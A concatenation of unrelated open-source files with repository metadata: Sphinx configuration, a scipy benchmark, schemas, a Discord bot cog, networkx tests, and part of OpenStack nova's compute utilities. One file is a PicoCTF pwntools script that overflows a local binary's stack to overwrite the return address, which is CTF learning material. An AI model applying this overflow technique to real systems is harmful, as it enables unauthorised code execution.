# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-shell documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-shell"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-shell",
"github_user": "googleapis",
"github_repo": "python-shell",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-shell-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-shell.tex",
"google-cloud-shell Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(root_doc, "google-cloud-shell", "google-cloud-shell Documentation", [author], 1,)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-shell",
"google-cloud-shell Documentation",
author,
"google-cloud-shell",
"google-cloud-shell Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None,),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
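# A typical local HTML build with this configuration might look like the
# following; the "docs" paths are assumptions and the repository's own nox
# sessions may wrap the call differently:
#
#   sphinx-build -W -b html docs docs/_build/html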
|
googleapis/python-shell
|
docs/conf.py
|
Python
|
apache-2.0
| 12,306 | 0.00065 |
import re
import numpy as np
from scipy import special
from .common import with_attributes, safe_import
with safe_import():
from scipy.special import cython_special
FUNC_ARGS = {
'airy_d': (1,),
'airy_D': (1,),
'beta_dd': (0.25, 0.75),
'erf_d': (1,),
'erf_D': (1+1j,),
'exprel_d': (1e-6,),
'gamma_d': (100,),
'gamma_D': (100+100j,),
'jv_dd': (1, 1),
'jv_dD': (1, (1+1j)),
'loggamma_D': (20,),
'logit_d': (0.5,),
'psi_d': (1,),
'psi_D': (1,),
}
class _CythonSpecialMeta(type):
"""
Add time_* benchmarks corresponding to cython_special._bench_*_cy
"""
def __new__(cls, cls_name, bases, dct):
params = [(10, 100, 1000), ('python', 'numpy', 'cython')]
param_names = ['N', 'api']
def get_time_func(name, args):
@with_attributes(params=[(name,), (args,)] + params,
param_names=['name', 'argument'] + param_names)
def func(self, name, args, N, api):
if api == 'python':
self.py_func(N, *args)
elif api == 'numpy':
self.np_func(*self.obj)
else:
self.cy_func(N, *args)
func.__name__ = 'time_' + name
return func
for name in FUNC_ARGS.keys():
func = get_time_func(name, FUNC_ARGS[name])
dct[func.__name__] = func
return type.__new__(cls, cls_name, bases, dct)
class CythonSpecial(metaclass=_CythonSpecialMeta):
def setup(self, name, args, N, api):
self.py_func = getattr(cython_special, '_bench_{}_py'.format(name))
self.cy_func = getattr(cython_special, '_bench_{}_cy'.format(name))
m = re.match('^(.*)_[dDl]+$', name)
self.np_func = getattr(special, m.group(1))
self.obj = []
for arg in args:
self.obj.append(arg*np.ones(N))
self.obj = tuple(self.obj)
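# Sketch of what one generated benchmark times, using the 'erf_d' entry from
# FUNC_ARGS above (argument 1, N repetitions); the _bench_*_py/_bench_*_cy
# helpers are the ones looked up in setup():
#
#   cython_special._bench_erf_d_py(1000, 1)   # Python-level loop
#   cython_special._bench_erf_d_cy(1000, 1)   # Cython loop
#   special.erf(1 * np.ones(1000))            # vectorized NumPy-API call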
|
WarrenWeckesser/scipy
|
benchmarks/benchmarks/cython_special.py
|
Python
|
bsd-3-clause
| 1,956 | 0 |
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
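# How an offset such as 76 is typically recovered with pwntools (the crash
# value below is illustrative; in practice it is the EIP observed under GDB):
#
#   from pwn import cyclic_find
#   cyclic_find(0x61616174)   # -> 76 with the default cyclic alphabet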
|
Caesurus/CTF_Writeups
|
2019-PicoCTF/exploits/exploit_overflow-1.py
|
Python
|
apache-2.0
| 624 | 0.00641 |
"""Request/Response Schemas are defined here"""
# pylint: disable=invalid-name
from marshmallow import Schema, fields, validate
from todo.constants import TO_DO, IN_PROGRESS, DONE
class TaskSchema(Schema):
"""Schema for serializing an instance of Task"""
id = fields.Int(required=True)
title = fields.Str(required=True)
description = fields.Str(required=True)
status = fields.Str(
required=True,
validate=validate.OneOf(
choices=[TO_DO, IN_PROGRESS, DONE],
error="Status must be one of {choices} (given: {input})"))
number = fields.Int(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
class BoardSchema(Schema):
"""Schema for serializing an instance of Board"""
id = fields.Int(required=True)
name = fields.Str(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
class BoardDetailsSchema(BoardSchema):
"""Schema for serializing an instance of Board and its tasks"""
tasks = fields.Nested(TaskSchema, many=True)
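# Minimal usage sketch (hypothetical payload); Schema.validate returns a dict
# of errors, which is empty when the data deserializes cleanly:
#
#   errors = TaskSchema().validate({
#       "id": 1, "title": "Write docs", "description": "...", "status": TO_DO,
#       "number": 1, "created_at": "2017-01-01T00:00:00",
#       "updated_at": "2017-01-01T00:00:00",
#   })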
|
kokimoribe/todo-api
|
todo/schemas.py
|
Python
|
mit
| 1,124 | 0 |
import asyncio
import discord
from discord.ext import commands
from cogs.utils import checks
from cogs.utils.storage import RedisDict
class TemporaryVoice:
"""A cog to create TeamSpeak-like voice channels."""
def __init__(self, liara):
self.liara = liara
self.config = RedisDict('pandentia.tempvoice', liara.redis)
self.config_default = {'channel': None, 'limit': 0}
self.tracked_channels = set()
def __unload(self):
self.config.close()
def filter(self, channels):
_channels = []
for channel in channels:
if channel.name.startswith('Temp: ') or channel.id in self.tracked_channels:
_channels.append(channel)
return _channels
async def create_channel(self, member: discord.Member):
guild = member.guild
overwrites = {
guild.default_role: discord.PermissionOverwrite(connect=False),
member: discord.PermissionOverwrite(connect=True, manage_channels=True, manage_roles=True)
}
channel = await guild.create_voice_channel(('Temp: {}\'s Channel'.format(member.name))[0:32],
overwrites=overwrites)
self.tracked_channels.add(channel.id)
await member.move_to(channel)
async def on_voice_state_update(self, member, *_):
guild = member.guild
if guild is None:
return # /shrug
if self.config.get(guild.id) is None:
return
# lobby processing
channel = self.liara.get_channel(self.config[guild.id]['channel'])
if channel is None:
return
for member in channel.members:
try:
await self.create_channel(member)
except discord.Forbidden:
pass
# empty channel cleanup
await asyncio.sleep(1) # wait for the dust to settle
channels = self.filter(guild.voice_channels)
for channel in channels:
if len(channel.members) == 0:
try:
await channel.delete()
self.tracked_channels.remove(channel.id)
                except (discord.NotFound, KeyError):
pass
async def on_channel_update(self, before, after):
if before.id not in self.tracked_channels:
return
if before.name != after.name:
await after.edit(name=before.name)
@commands.command()
@commands.guild_only()
@checks.mod_or_permissions(manage_channels=True)
async def create_lobby(self, ctx):
"""Creates a temporary voice lobby."""
config = self.config.get(ctx.guild.id, self.config_default)
if config['channel'] is not None:
channel = self.liara.get_channel(config['channel'])
if channel is not None:
await ctx.send('You need to remove the original lobby before creating another one.')
return
try:
channel = await ctx.guild.create_voice_channel('Lobby', overwrites={
ctx.guild.default_role: discord.PermissionOverwrite(speak=False)})
if self.config.get(ctx.guild.id) is None:
config['channel'] = channel.id
self.config[ctx.guild.id] = config
else:
self.config[ctx.guild.id]['channel'] = channel.id
self.config.commit(ctx.guild.id)
await ctx.send('Channel created! You can rename it to whatever you want now.')
except discord.Forbidden:
await ctx.send('It would appear that I don\'t have permissions to create channels.')
def setup(liara):
liara.add_cog(TemporaryVoice(liara))
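# Hypothetical sketch of enabling this cog, assuming "liara" behaves like a
# discord.ext.commands.Bot and this file is importable as cogs.tempvoice:
#
#   liara.load_extension('cogs.tempvoice')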
|
Pandentia/Liara-Cogs
|
cogs/tempvoice.py
|
Python
|
mit
| 3,721 | 0.00215 |
import brickpi3
|
nextdude/robogator-controller
|
src/test-motor.py
|
Python
|
mit
| 19 | 0 |
#!/usr/bin/env python
"""
Copyright 2014 Jirafe, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Category:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'id': 'str',
'name': 'str'
}
self.id = None # str
self.name = None # str
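# Minimal usage sketch (hypothetical values), mirroring the swaggerTypes
# declared above:
#
#   category = Category()
#   category.id = "123"
#   category.name = "Accessories"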
|
concerned3rdparty/jirafe-python
|
jirafe/models/Category.py
|
Python
|
mit
| 944 | 0.007415 |
#!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestGeneratorsGeometric():
def test_random_geometric_graph(self):
G=nx.random_geometric_graph(50,0.25)
assert_equal(len(G),50)
def test_geographical_threshold_graph(self):
G=nx.geographical_threshold_graph(50,100)
assert_equal(len(G),50)
def test_waxman_graph(self):
G=nx.waxman_graph(50,0.5,0.1)
assert_equal(len(G),50)
G=nx.waxman_graph(50,0.5,0.1,L=1)
assert_equal(len(G),50)
    def test_navigable_small_world(self):
G = nx.navigable_small_world_graph(5,p=1,q=0)
gg = nx.grid_2d_graph(5,5).to_directed()
assert_true(nx.is_isomorphic(G,gg))
G = nx.navigable_small_world_graph(5,p=1,q=0,dim=3)
gg = nx.grid_graph([5,5,5]).to_directed()
assert_true(nx.is_isomorphic(G,gg))
G = nx.navigable_small_world_graph(5,p=1,q=0,dim=1)
gg = nx.grid_graph([5]).to_directed()
assert_true(nx.is_isomorphic(G,gg))
|
LumPenPacK/NetworkExtractionFromImages
|
win_build/nefi2_win_amd64_msvc_2015/site-packages/networkx/generators/tests/test_geometric.py
|
Python
|
bsd-2-clause
| 1,036 | 0.029923 |
# Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Compute-related Utilities and helpers."""
import contextlib
import functools
import inspect
import itertools
import math
import traceback
import netifaces
from oslo_log import log
from oslo_serialization import jsonutils
from oslo_utils import excutils
from nova.accelerator import cyborg
from nova import block_device
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova import notifications
from nova.notifications.objects import aggregate as aggregate_notification
from nova.notifications.objects import base as notification_base
from nova.notifications.objects import compute_task as task_notification
from nova.notifications.objects import exception as notification_exception
from nova.notifications.objects import flavor as flavor_notification
from nova.notifications.objects import instance as instance_notification
from nova.notifications.objects import keypair as keypair_notification
from nova.notifications.objects import libvirt as libvirt_notification
from nova.notifications.objects import metrics as metrics_notification
from nova.notifications.objects import request_spec as reqspec_notification
from nova.notifications.objects import scheduler as scheduler_notification
from nova.notifications.objects import server_group as sg_notification
from nova.notifications.objects import volume as volume_notification
from nova import objects
from nova.objects import fields
from nova import rpc
from nova import safe_utils
from nova import utils
CONF = nova.conf.CONF
LOG = log.getLogger(__name__)
# These properties are specific to a particular image by design. It
# does not make sense for them to be inherited by server snapshots.
# This list is distinct from the configuration option of the same
# (lowercase) name.
NON_INHERITABLE_IMAGE_PROPERTIES = frozenset([
'cinder_encryption_key_id',
'cinder_encryption_key_deletion_policy',
'img_signature',
'img_signature_hash_method',
'img_signature_key_type',
'img_signature_certificate_uuid'])
# Properties starting with these namespaces are reserved for internal
# use by other services. It does not make sense (and may cause a request
# to fail) if we include them in a snapshot.
NON_INHERITABLE_IMAGE_NAMESPACES = frozenset([
'os_glance',
])
def exception_to_dict(fault, message=None):
"""Converts exceptions to a dict for use in notifications.
:param fault: Exception that occurred
:param message: Optional fault message, otherwise the message is derived
from the fault itself.
:returns: dict with the following items:
- exception: the fault itself
- message: one of (in priority order):
- the provided message to this method
- a formatted NovaException message
- the fault class name
- code: integer code for the fault (defaults to 500)
"""
# TODO(johngarbutt) move to nova/exception.py to share with wrap_exception
code = 500
if hasattr(fault, "kwargs"):
code = fault.kwargs.get('code', 500)
# get the message from the exception that was thrown
# if that does not exist, use the name of the exception class itself
try:
if not message:
message = fault.format_message()
# These exception handlers are broad so we don't fail to log the fault
# just because there is an unexpected error retrieving the message
except Exception:
# In this case either we have a NovaException which failed to format
# the message or we have a non-nova exception which could contain
# sensitive details. Since we're not sure, be safe and set the message
# to the exception class name. Note that we don't guard on
# context.is_admin here because the message is always shown in the API,
# even to non-admin users (e.g. NoValidHost) but only the traceback
# details are shown to users with the admin role. Checking for admin
# context here is also not helpful because admins can perform
# operations on a tenant user's server (migrations, reboot, etc) and
# service startup and periodic tasks could take actions on a server
# and those use an admin context.
message = fault.__class__.__name__
# NOTE(dripton) The message field in the database is limited to 255 chars.
# MySQL silently truncates overly long messages, but PostgreSQL throws an
# error if we don't truncate it.
u_message = utils.safe_truncate(message, 255)
fault_dict = dict(exception=fault)
fault_dict["message"] = u_message
fault_dict["code"] = code
return fault_dict
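# Illustrative call (hypothetical fault object), following the docstring above:
#
#   fault = exception.NoValidHost(reason='no hosts available')
#   exception_to_dict(fault)
#   # -> {'exception': fault, 'message': fault.format_message(), 'code': 500}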
def _get_fault_details(exc_info, error_code):
details = ''
# TODO(mriedem): Why do we only include the details if the code is 500?
# Though for non-nova exceptions the code will probably be 500.
if exc_info and error_code == 500:
# We get the full exception details including the value since
# the fault message may not contain that information for non-nova
# exceptions (see exception_to_dict).
details = ''.join(traceback.format_exception(
exc_info[0], exc_info[1], exc_info[2]))
return str(details)
def add_instance_fault_from_exc(context, instance, fault, exc_info=None,
fault_message=None):
"""Adds the specified fault to the database."""
fault_obj = objects.InstanceFault(context=context)
fault_obj.host = CONF.host
fault_obj.instance_uuid = instance.uuid
fault_obj.update(exception_to_dict(fault, message=fault_message))
code = fault_obj.code
fault_obj.details = _get_fault_details(exc_info, code)
fault_obj.create()
def get_device_name_for_instance(instance, bdms, device):
"""Validates (or generates) a device name for instance.
This method is a wrapper for get_next_device_name that gets the list
of used devices and the root device from a block device mapping.
    :raises TooManyDiskDevices: if the maximum number of disk devices allowed
        to attach to a single instance is exceeded.
"""
mappings = block_device.instance_block_mapping(instance, bdms)
return get_next_device_name(instance, mappings.values(),
mappings['root'], device)
def default_device_names_for_instance(instance, root_device_name,
*block_device_lists):
"""Generate missing device names for an instance.
    :raises TooManyDiskDevices: if the maximum number of disk devices allowed
        to attach to a single instance is exceeded.
"""
dev_list = [bdm.device_name
for bdm in itertools.chain(*block_device_lists)
if bdm.device_name]
if root_device_name not in dev_list:
dev_list.append(root_device_name)
for bdm in itertools.chain(*block_device_lists):
dev = bdm.device_name
if not dev:
dev = get_next_device_name(instance, dev_list,
root_device_name)
bdm.device_name = dev
bdm.save()
dev_list.append(dev)
def check_max_disk_devices_to_attach(num_devices):
maximum = CONF.compute.max_disk_devices_to_attach
if maximum < 0:
return
if num_devices > maximum:
raise exception.TooManyDiskDevices(maximum=maximum)
def get_next_device_name(instance, device_name_list,
root_device_name=None, device=None):
"""Validates (or generates) a device name for instance.
If device is not set, it will generate a unique device appropriate
for the instance. It uses the root_device_name (if provided) and
the list of used devices to find valid device names. If the device
name is valid but applicable to a different backend (for example
/dev/vdc is specified but the backend uses /dev/xvdc), the device
name will be converted to the appropriate format.
    :raises TooManyDiskDevices: if the maximum number of disk devices allowed
        to attach to a single instance is exceeded.
"""
req_prefix = None
req_letter = None
if device:
try:
req_prefix, req_letter = block_device.match_device(device)
except (TypeError, AttributeError, ValueError):
raise exception.InvalidDevicePath(path=device)
if not root_device_name:
root_device_name = block_device.DEFAULT_ROOT_DEV_NAME
try:
prefix = block_device.match_device(
block_device.prepend_dev(root_device_name))[0]
except (TypeError, AttributeError, ValueError):
raise exception.InvalidDevicePath(path=root_device_name)
if req_prefix != prefix:
LOG.debug("Using %(prefix)s instead of %(req_prefix)s",
{'prefix': prefix, 'req_prefix': req_prefix})
used_letters = set()
for device_path in device_name_list:
letter = block_device.get_device_letter(device_path)
used_letters.add(letter)
check_max_disk_devices_to_attach(len(used_letters) + 1)
if not req_letter:
req_letter = _get_unused_letter(used_letters)
if req_letter in used_letters:
raise exception.DevicePathInUse(path=device)
return prefix + req_letter
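# Worked example for the function above (hypothetical inputs): with
# root_device_name='/dev/vda', device_name_list=['/dev/vda', '/dev/vdb'] and
# no requested device, the used letters are {'a', 'b'}, _get_unused_letter
# picks 'c', and the result is '/dev/vdc'.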
def get_root_bdm(context, instance, bdms=None):
if bdms is None:
if isinstance(instance, objects.Instance):
uuid = instance.uuid
else:
uuid = instance['uuid']
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, uuid)
return bdms.root_bdm()
def is_volume_backed_instance(context, instance, bdms=None):
root_bdm = get_root_bdm(context, instance, bdms)
if root_bdm is not None:
return root_bdm.is_volume
# in case we hit a very old instance without root bdm, we _assume_ that
# instance is backed by a volume, if and only if image_ref is not set
if isinstance(instance, objects.Instance):
return not instance.image_ref
return not instance['image_ref']
def heal_reqspec_is_bfv(ctxt, request_spec, instance):
"""Calculates the is_bfv flag for a RequestSpec created before Rocky.
Starting in Rocky, new instances have their RequestSpec created with
the "is_bfv" flag to indicate if they are volume-backed which is used
by the scheduler when determining root disk resource allocations.
RequestSpecs created before Rocky will not have the is_bfv flag set
so we need to calculate it here and update the RequestSpec.
:param ctxt: nova.context.RequestContext auth context
:param request_spec: nova.objects.RequestSpec used for scheduling
:param instance: nova.objects.Instance being scheduled
"""
if 'is_bfv' in request_spec:
return
# Determine if this is a volume-backed instance and set the field
# in the request spec accordingly.
request_spec.is_bfv = is_volume_backed_instance(ctxt, instance)
request_spec.save()
def convert_mb_to_ceil_gb(mb_value):
gb_int = 0
if mb_value:
gb_float = mb_value / 1024.0
# ensure we reserve/allocate enough space by rounding up to nearest GB
gb_int = int(math.ceil(gb_float))
return gb_int
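# Rounding behaviour of convert_mb_to_ceil_gb, for illustration:
#   convert_mb_to_ceil_gb(0)    -> 0   (falsy input short-circuits)
#   convert_mb_to_ceil_gb(1024) -> 1
#   convert_mb_to_ceil_gb(1500) -> 2   (1500 / 1024.0 is ~1.46, rounded up)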
def _get_unused_letter(used_letters):
# Return the first unused device letter
index = 0
while True:
letter = block_device.generate_device_letter(index)
if letter not in used_letters:
return letter
index += 1
def get_value_from_system_metadata(instance, key, type, default):
"""Get a value of a specified type from image metadata.
@param instance: The instance object
@param key: The name of the property to get
    @param type: The python type the value should be returned as
@param default: The value to return if key is not set or not the right type
"""
value = instance.system_metadata.get(key, default)
try:
return type(value)
except ValueError:
LOG.warning("Metadata value %(value)s for %(key)s is not of "
"type %(type)s. Using default value %(default)s.",
{'value': value, 'key': key, 'type': type,
'default': default}, instance=instance)
return default
def notify_usage_exists(notifier, context, instance_ref, host,
current_period=False, ignore_missing_network_data=True,
system_metadata=None, extra_usage_info=None):
"""Generates 'exists' unversioned legacy and transformed notification
for an instance for usage auditing purposes.
:param notifier: a messaging.Notifier
:param context: request context for the current operation
:param instance_ref: nova.objects.Instance object from which to report
usage
:param host: the host emitting the notification
:param current_period: if True, this will generate a usage for the
current usage period; if False, this will generate a usage for the
previous audit period.
:param ignore_missing_network_data: if True, log any exceptions generated
while getting network info; if False, raise the exception.
:param system_metadata: system_metadata override for the instance. If
None, the instance_ref.system_metadata will be used.
:param extra_usage_info: Dictionary containing extra values to add or
override in the notification if not None.
"""
audit_start, audit_end = notifications.audit_period_bounds(current_period)
if system_metadata is None:
system_metadata = utils.instance_sys_meta(instance_ref)
# add image metadata to the notification:
image_meta = notifications.image_meta(system_metadata)
extra_info = dict(audit_period_beginning=str(audit_start),
audit_period_ending=str(audit_end),
image_meta=image_meta)
if extra_usage_info:
extra_info.update(extra_usage_info)
notify_about_instance_usage(notifier, context, instance_ref, 'exists',
extra_usage_info=extra_info)
audit_period = instance_notification.AuditPeriodPayload(
audit_period_beginning=audit_start,
audit_period_ending=audit_end,
)
payload = instance_notification.InstanceExistsPayload(
context=context,
instance=instance_ref,
audit_period=audit_period,
)
notification = instance_notification.InstanceExistsNotification(
context=context,
priority=fields.NotificationPriority.INFO,
publisher=notification_base.NotificationPublisher(
host=host, source=fields.NotificationSource.COMPUTE,
),
event_type=notification_base.EventType(
object='instance',
action=fields.NotificationAction.EXISTS,
),
payload=payload,
)
notification.emit(context)
def notify_about_instance_usage(notifier, context, instance, event_suffix,
network_info=None, extra_usage_info=None,
fault=None):
"""Send an unversioned legacy notification about an instance.
All new notifications should use notify_about_instance_action which sends
a versioned notification.
:param notifier: a messaging.Notifier
:param event_suffix: Event type like "delete.start" or "exists"
:param network_info: Networking information, if provided.
:param extra_usage_info: Dictionary containing extra values to add or
override in the notification.
"""
if not extra_usage_info:
extra_usage_info = {}
usage_info = notifications.info_from_instance(context, instance,
network_info, populate_image_ref_url=True, **extra_usage_info)
if fault:
# NOTE(johngarbutt) mirrors the format in wrap_exception
fault_payload = exception_to_dict(fault)
LOG.debug(fault_payload["message"], instance=instance)
usage_info.update(fault_payload)
if event_suffix.endswith("error"):
method = notifier.error
else:
method = notifier.info
method(context, 'compute.instance.%s' % event_suffix, usage_info)
def _get_fault_and_priority_from_exception(exception: Exception):
fault = None
priority = fields.NotificationPriority.INFO
if not exception:
return fault, priority
fault = notification_exception.ExceptionPayload.from_exception(exception)
priority = fields.NotificationPriority.ERROR
return fault, priority
@rpc.if_notifications_enabled
def notify_about_instance_action(context, instance, host, action, phase=None,
source=fields.NotificationSource.COMPUTE,
exception=None, bdms=None):
"""Send versioned notification about the action made on the instance
:param instance: the instance which the action performed on
:param host: the host emitting the notification
:param action: the name of the action
